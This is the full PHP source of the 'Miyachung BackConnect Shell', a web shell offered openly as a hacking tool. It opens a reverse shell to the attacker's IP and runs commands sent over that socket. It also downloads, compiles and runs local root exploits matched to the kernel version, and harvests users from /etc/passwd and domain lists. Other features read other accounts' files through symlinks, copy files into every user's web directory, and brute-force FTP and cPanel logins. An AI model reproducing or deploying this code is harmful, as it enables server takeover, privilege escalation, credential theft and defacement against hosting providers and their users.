|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ =================================================================== . Miyachung BackConnect Shell . Written by Miyachung . Janissaries.Org . Contact: miyachung@hotmail . Video : https://www.youtube.com/watch?v=sWUR9gt4ia0 Commands works with shell_exec() function @ Options - exploit = Automatic Search & Download & Run a local root exploit which matches with kernel release - grabusr = Grab users from /etc/passwd and save into a file ( users ) - domains = List domains from /var/named - getf = Find and grab the name given file from all public_html dirs ( only works with /home/USER/public_html servers ) - catln = Cat file with ln -s method - index = Try copy the name given file to all public_html dirs ( only works with /home/USER/public_html servers ) - home = Change dir into home folder - ftp = Performs ftp brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers ) - cpanel = Performs cpanel brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers ) */ ob_start(); $server_ip = $_SERVER['SERVER_ADDR']; $your_ip = getenv('REMOTE_ADDR'); $your_port = 443; $timeout = 5; if(!empty($server_ip) && !empty($your_ip) && !empty($your_port) && !empty($timeout)) { $create = new BC($your_ip,$your_port,$server_ip,$timeout); } /* @ Connection Class */ class BC { private $your_ip; private $your_port; private $server_ip; private $timeout; private $homefolder; public function __construct($yip,$yp,$sip,$t) { $this->your_ip = $yip; $this->your_port = $yp; $this->server_ip = $sip; $this->timeout = $t; print("Miyachung BackConnect Shell"); print("Miyachung BackConnect Shell\n
"); print("Your ip is $this->your_ip\n
"); print("Your port is $this->your_port\n
"); print("Server ip is $this->server_ip\n
"); print("Timeout seconds $this->timeout\n\n

"); print("Trying to create shell process $this->your_ip with $this->your_port on $this->server_ip\n
"); ob_flush(); flush(); $this->createshell(); } private function createshell() { $socket = @fsockopen($this->your_ip,$this->your_port,$errno,$errstr,$this->timeout) or die("Unfortunately could not spawn shell\n
"); print("Shell process opened to $this->server_ip > $this->your_ip:$this->your_port\n
"); ob_flush(); flush(); fwrite($socket,"============================================================="); fwrite($socket," .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ "); fwrite($socket,"Welcome to the BackConnect Shell !!\n"); fwrite($socket,"Written by Miyachung\n"); fwrite($socket,"Informations\n"); fwrite($socket,"------------------------------------------------\n"); fwrite($socket,"uname -a: ".@shell_exec("uname -a")); fwrite($socket,"whoami: ".@shell_exec("whoami")); fwrite($socket,"id: ".@shell_exec("id")); fwrite($socket,"pwd: ".@shell_exec("pwd")); fwrite($socket,"@ Options\n\n"); fwrite($socket,"- exploit = Automatic Search & Download & Run a local root exploit which matches with kernel release\n"); fwrite($socket,"- grabusr = Grab users from /etc/passwd and save into a file ( users )\n"); fwrite($socket,"- domains = List domains from /var/named\n"); fwrite($socket,"- getf = Find and grab the name given file from all public_html dirs ( only works with /home/USER/public_html servers )\n"); fwrite($socket,"- catln = Cat file with ln -s method\n"); fwrite($socket,"- index = Try copy the name given file to all public_html dirs ( only works with /home/USER/public_html servers )\n"); fwrite($socket,"- home = Change dir into home folder\n"); fwrite($socket,"- ftp = Performs ftp brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers )\n"); fwrite($socket,"- cpanel = Performs cpanel brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers )\n"); $this->homefolder = trim(@shell_exec("pwd")); fwrite($socket,"=============================================================\n"); $result= @shell_exec("whoami"); fwrite($socket,$result); print "Command whoami;\n"; print $result; ob_flush(); flush(); preg_match("#([0-9]).([0-9]).([0-9]+)-([a-z0-9]+)#si",@shell_exec("uname -r"),$version); $version1 = $version[0]; $version2 = $version[1].".".$version[2].".".$version[3]; print "
";
	while(1)
	{
	$enter = fgets($socket);
	if(preg_match('#exit#',$enter)){fwrite($socket,"Process closed\n");exit("Process closed");}
	if(preg_match('#exploit#',$enter)){$this->search($version1,$socket);$this->search($version2,$socket);}
	if(preg_match('#grabusr#',$enter)){$this->grab_users($socket);}
	if(preg_match('#catln (.+)#',$enter,$file)){$this->catln($file[1],$socket);}
	if(preg_match('#index (.+)#',$enter,$file)){$this->index($file[1],$socket);}
	if(preg_match('#getf (.+)#',$enter,$file)){$this->getf($file[1],$socket);}
	if(preg_match('#ftp (.+)#',$enter,$file)){$this->ftp($file[1],$socket);}
	if(preg_match('#cpanel (.+)#',$enter,$file)){$this->cpanel($file[1],$socket);}
	if(preg_match('#domains#',$enter)){$this->domains($socket);}
	if(eregi('home',$enter)){chdir($this->homefolder);}
	if(strpos($enter,'cd ..')){
	$curr = getcwd();
	$explode = explode("/",$curr);
	$c = count($explode);
	unset($explode[$c-1]);
	$explode = array_values(array_filter($explode));
	$path	 = implode("/",$explode);
	$path	 = "/".$path;
	if(!chdir($path)){fwrite($socket,"Can't chdir into $path : Permission denied\n");}
	}
	elseif(preg_match('#cd (.+)#',$enter,$dir)){
	$curr = getcwd();
	if(preg_match("#\/#si",$dir[1]))
	{
	if(!chdir($dir[1])){fwrite($socket,"Can't chdir into $dir[1] : Permission denied\n");}
	}
	else
	{
	if(!chdir($curr."/".$dir[1])){fwrite($socket,"Can't chdir into $curr/$dir[1] : Permission denied\n");}
	}
	
	}
	$result= @shell_exec(trim($enter));
	fwrite($socket,$result);
	print "Command ".trim($enter).";\n";
	print $result;
	ob_flush(); flush();
	}
	print "
"; fclose($socket); } private function search($version,$socket) { fwrite($socket,"Release: $version\n"); print("Release: $version\n
"); ob_flush();flush(); fwrite($socket,"Searching Exploit-DB for local root exploits..\n"); print("Searching Exploit-DB for local root exploits..\n
"); $exploit_db = $this->curl("http://www.exploit-db.com/search/?action=search&filter_description=$version"); if(preg_match('/No results/si',$exploit_db)) { fwrite($socket,"Not found any exploits\n"); print("Not found any exploits\n
"); ob_flush();flush(); } else { fwrite($socket,"==================== Possible Exploits =====================\n"); print("==================== Possible Exploits =====================\n
"); ob_flush();flush(); preg_match_all('#(.*?)<\/td>#si',$exploit_db,$list); foreach($list[1] as $listx) { preg_match('#(.*?)<\/a>#si',$listx,$exploit); fwrite($socket,"[+] ".$exploit[2]."\n"); print("[+] ".$exploit[2]."\n
"); fwrite($socket,"Trying pwn this server with this exploit\n"); print("Trying pwn this server with this exploit\n
"); fwrite($socket,"Downloading => ".$exploit[1]."\n"); print("Downloading => ".$exploit[1]."\n
"); ob_flush();flush(); $download = $this->download($exploit[1]); if($download != false) { fwrite($socket,"File downloaded saved as $download\n"); print("File downloaded saved as $download\n
"); fwrite($socket,"Trying compile to $download file\n"); print("Trying compile to $download file\n
"); ob_flush();flush(); $withoutc = str_replace(".c","",$download); @shell_exec("gcc $download -o $withoutc"); if(file_exists($withoutc)) { fwrite($socket,"File compiled\n"); print("File compiled\n
"); fwrite($socket,"Setting chmod options\n"); print("Setting chmod options\n
"); @shell_exec("chmod +x $withoutc"); fwrite($socket,"Running exploit..!\n"); print("Running exploit..!\n
"); ob_flush();flush(); @shell_exec("./$withoutc"); } else { fwrite($socket,"File doesn't compile\n"); print("File doesn't compile\n
"); ob_flush();flush(); } } else { fwrite($socket,"File doesn't download\n"); print("File doesn't download\n
"); ob_flush();flush(); } } fwrite($socket,"==================== Possible Exploits =====================\n"); print("==================== Possible Exploits =====================\n
"); ob_flush();flush(); } fwrite($socket,"Searching 1337day for local root exploits..\n"); print("Searching 1337day for local root exploits..\n
"); ob_flush();flush(); $day1337 = $this->curl("http://www.1337day.com/search","agree=Ok&dong=$version&submit_search=Submit"); preg_match_all("#(.*?)<\/a>#si",$day1337,$exploits); if($exploits[1]) { fwrite($socket,"==================== Possible Exploits =====================\n"); print("==================== Possible Exploits =====================\n
"); ob_flush();flush(); foreach($exploits[1] as $i => $exploit) { fwrite($socket,"[+] ".$exploits[2][$i]."\n"); print("[+] ".$exploits[2][$i]."\n
"); fwrite($socket,"Trying pwn this server with this exploit\n"); print("Trying pwn this server with this exploit\n
"); $exploit_link = "http://www.1337day.com/exploit/$exploit"; fwrite($socket,"Downloading => ".$exploit_link."\n"); print("Downloading => ".$exploit_link."\n
"); ob_flush();flush(); $download = $this->day1337download($exploit_link); if($download != false) { fwrite($socket,"File downloaded saved as $download\n"); print("File downloaded saved as $download\n
"); fwrite($socket,"Trying compile to $download file\n"); print("Trying compile to $download file\n
"); ob_flush();flush(); $withoutc = str_replace(".c","",$download); @shell_exec("gcc $download -o $withoutc"); if(file_exists($withoutc)) { fwrite($socket,"File compiled\n"); print("File compiled\n
"); fwrite($socket,"Setting chmod options\n"); print("Setting chmod options\n
"); @shell_exec("chmod +x $withoutc"); fwrite($socket,"Running exploit..!\n"); print("Running exploit..!\n
"); ob_flush();flush(); @shell_exec("./$withoutc"); } else { fwrite($socket,"File doesn't compile\n"); print("File doesn't compile\n
"); ob_flush();flush(); } } } fwrite($socket,"==================== Possible Exploits =====================\n"); print("==================== Possible Exploits =====================\n
"); ob_flush();flush(); } else { fwrite($socket,"Not found any exploits\n"); print("Not found any exploits\n
"); ob_flush();flush(); } } private function curl($site,$post=null) { $ch = curl_init(); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_URL,$site); if($post != null) { curl_setopt($ch,CURLOPT_POSTFIELDS,$post); } $exec = curl_exec($ch); curl_close($ch); return $exec; } private function download($url) { preg_match('#\/exploits\/(.+)#si',$url,$filename); $filename = $filename[1].".c"; $url = str_replace("exploits","download",$url); $openurl = @file_get_contents($url); if($openurl && file_put_contents($filename,$openurl)){ return $filename; } else { return false; } } private function day1337download($url) { preg_match('#\/exploit\/(.+)#si',$url,$filename); $filename = $filename[1].".c"; $data = $this->curl($url,"agree=Ok"); preg_match("#
(.*?)<\/pre>#si",$data,$content);
	if(file_put_contents($filename,$content))
	{
	return $filename;
	}
	else
	{
	return false;
	}
	
	}
	private function grab_users($socket)
	{
	$read = file("/etc/passwd");
	$x0x  = "";
	foreach($read as $text)
	{
	$text = trim($text);
	$user = explode(":",$text);
	$user = $user[0];
	$xox .= $user."\r\n";
	fwrite($socket,$user."\n");
	print($user."\n");
	}
	fwrite($socket,"Grabbed ".count($read)." users from /etc/passwd\n");
	print("Grabbed ".count($read)." users from /etc/passwd\n");
	$save = $this->save_as("users",$xox,"wb");
	if($save){fwrite($socket,"Saved into file as 'users'\n");print("Saved into file as 'users'\n");}else{fwrite($socket,"Doesn't save into file\n");print("Doesn't save into file\n");}
	}
	private function catln($file,$socket)
	{
	$savefile = uniqid();
	@shell_exec("ln -s $file ".$savefile);
	if(file_exists($savefile))
	{
	fwrite($socket,file_get_contents($savefile));
	print(file_get_contents($savefile));
	fwrite($socket,"File name $savefile\n");
	print("File name $savefile\n");
	}
	else
	{
	fwrite($socket,"File doesn't read\n");
	print("File doesn't read\n");
	}
	
	}
	private function index($file,$socket)
	{
	$etc  = file('/etc/passwd');
	$count= 0;
	foreach($etc as $txt)
	{
	$txt = trim($txt);
	$user= explode(":",$txt);
	$user= $user[0];
	$path= "/home/$user/public_html/$file";
	@shell_exec("cp $file $path");
	if(file_exists($path))
	{
	fwrite($socket,"File created: ".$path."\n");
	print("File created: ".$path."\n");
	$count++;
	}
	
	}
	fwrite($socket,"Completed\n");
	print("Completed\n");
	fwrite($socket,"File copied into $count dirs\n");
	print("File copied into $count dirs\n");
	}
	private function getf($file,$socket)
	{
	$etc   = file('/etc/passwd');
	$count = 0; 
	foreach($etc as $txt)
	{
	$txt = trim($txt);
	$user= explode(":",$txt);
	$user= $user[0];
	$path= "/home/$user/public_html/$file";
	if(file_exists($path))
	{
	fwrite($socket,"File found: ".$path."\n");
	print("File found: ".$path."\n");
	$content = file_get_contents($path);
	if($content)
	{
	$save = $this->save_as($user."-".$file,$content);
	if($save){
	fwrite($socket,"File is readable,saved into file named $user-$file\n");
	print("File is readable,saved into file named $user-$file\n");
	$count++;
	}
	else
	{
	fwrite($socket,"File is readable but current dir is not writable\n");
	print("File is readable but current dir is not writable\n");
	}
	
	}
	else
	{
	@shell_exec("ln -s $path $user-$file");
	if(file_exists($user[0]."-".$file)){
	fwrite($socket,"File is read with ln -s method,saved into file named $user-$file\n");
	print("File is read with ln -s method,saved into file named $user-$file\n");
	$count++;
	}
	else
	{
	fwrite($socket,"File is not readable\n");
	print("File is not readable\n");
	}
	
	}
	
	}
	
	}
	fwrite($socket,"Grabbed $count files\n");
	print("Grabbed $count files\n");
	
	}
	private function domains($socket)
	{
	$x0x   = "";
	$c	   = 0;
	$path		= "/var/named";
	$dir_handle = @opendir($path);
	if($dir_handle)
	{
	while ($file = readdir($dir_handle)) 
	{
	if (!is_dir($path."/".$file) AND ($file != "..") AND ($file != ".")) { 
	$dosya = str_replace(".db","",$file);
	fwrite($socket,$dosya."\n");
	print($dosya."\n");
	$x0x .= $dosya."\r\n";
	$c++;
	}

	}
	$save = $this->save_as("d0mains",$x0x,"wb");
	if($save == false){fwrite($socket,"Got domains but can't save into a file this dir is not writable\n");print("Got domains but can't save into a file this dir is not writable\n");}
	else
	{
	fwrite($socket,"Grabbed $c domains\n");
	print("Grabbed $c domains\n");
	fwrite($socket,"Saved into 'd0mains'\n");
	print("Saved into 'd0mains'\n");
	}
	closedir($dir_handle);
	} 
	else
	{
	fwrite($socket,"Doesn't read /var/named\n");
	print("Doesn't read /var/named\n");
	}
	
	}
	private function ftp($wordlist,$socket)
	{
	fwrite($socket,"Starting ftp crack..\n");
	ob_flush();flush();
	$open = file($wordlist);
	$userx= array();
	foreach($open as $pwd)
	{
	$pwd = trim($pwd);
	fwrite($socket,"Password ".$pwd." trying on all users\n");
	ob_flush();flush();
	$users= file('/etc/passwd');
	foreach($users as $user)
	{
	$user = trim($user);
	$user = explode(":",$user);
	$user = $user[0];
	$userx[] = $user;
	}
	$userx = array_filter($userx);
	$userx = array_unique($userx);
	$userx = array_chunk($userx,25);
	$multi = curl_multi_init();
	foreach($userx as $u)
	{
		for($i=0;$i<=count($u)-1;$i++)
		{
		$curl[$i] = curl_init();
		curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);
		curl_setopt($curl[$i],CURLOPT_URL,"ftp://".$this->server_ip);
		curl_setopt($curl[$i],CURLOPT_USERPWD,trim($u[$i]).":".$pwd);
		curl_setopt($curl[$i],CURLOPT_FOLLOWLOCATION,1);
		curl_setopt($curl[$i],CURLOPT_TIMEOUT,4);
		curl_multi_add_handle($multi,$curl[$i]);
		}
		do
		{
		curl_multi_exec($multi,$active);
		usleep(1);
		}while($active>0);
		foreach($curl as $cid => $cend)
		{
		$data[$cid] = curl_multi_getcontent($cend);
		if(preg_match('#drw#si',$data[$cid]))
		{
		fwrite($socket,"Found username: $u[$cid] , password: $pwd\n");
		print("Found username: $u[$cid] , password: $pwd\n");
		$save = $this->save_as("ftps.txt","Found username: $u[$cid] , password: $pwd\r\n","ab");
		ob_flush();flush();
		}
		else
		{
		fwrite($socket,"Not found $u[$cid]:$pwd\n");
		print("Not found $u[$cid]:$pwd\n");
		ob_flush();flush();
		}
		curl_multi_remove_handle($multi,$cend);
		}
	}
	
	}
	
	}
	private function cpanel($wordlist,$socket)
	{
	fwrite($socket,"Starting cpanel crack..\n");
	ob_flush();flush();
	$open = file($wordlist);
	$userx= array();
	foreach($open as $pwd)
	{
	$pwd = trim($pwd);
	fwrite($socket,"Password ".$pwd." trying on all users\n");
	ob_flush();flush();
	$users= file('/etc/passwd');
	foreach($users as $user)
	{
	$user = trim($user);
	$user = explode(":",$user);
	$user = $user[0];
	$userx[] = $user;
	}
	$userx = array_filter($userx);
	$userx = array_unique($userx);
	$userx = array_chunk($userx,25);
	$multi = curl_multi_init();
	foreach($userx as $u)
	{
		for($i=0;$i<=count($u)-1;$i++)
		{
		$curl[$i] = curl_init();
		curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);
		curl_setopt($curl[$i],CURLOPT_URL,"https://$this->server_ip:2083/login/?login_only=1");
		curl_setopt($curl[$i],CURLOPT_POSTFIELDS,"user=".trim($u[$i])."&pass=$pwd");
		curl_setopt($curl[$i],CURLOPT_SSL_VERIFYPEER,0);
		curl_setopt($curl[$i],CURLOPT_SSL_VERIFYHOST,0);
		curl_setopt($curl[$i],CURLOPT_FOLLOWLOCATION,1);
		curl_setopt($curl[$i],CURLOPT_TIMEOUT,4);
		curl_multi_add_handle($multi,$curl[$i]);
		}
		do
		{
		curl_multi_exec($multi,$active);
		usleep(1);
		}while($active>0);
		foreach($curl as $cid => $cend)
		{
		$data[$cid] = curl_getinfo($cend);
		if($data[$cid]['http_code'] != 401)
		{
		fwrite($socket,"Found username: $u[$cid] , password: $pwd\n");
		print("Found username: $u[$cid] , password: $pwd\n");
		$save = $this->save_as("cpanels.txt","Found username: $u[$cid] , password: $pwd\r\n","ab");
		ob_flush();flush();
		}
		else
		{
		fwrite($socket,"Not found $u[$cid]:$pwd\n");
		print("Not found $u[$cid]:$pwd\n");
		ob_flush();flush();
		}
		curl_multi_remove_handle($multi,$cend);
		}
	}
	
	}
	
	}
	private function save_as($filename,$content,$type='ab')
	{
	$fopen = fopen($filename,$type);
	if($fopen)
	{
	fwrite($fopen,$content);
	fclose($fopen);
	return true;
	}
	else
	{
	return false;
	}
	
	}
}
?>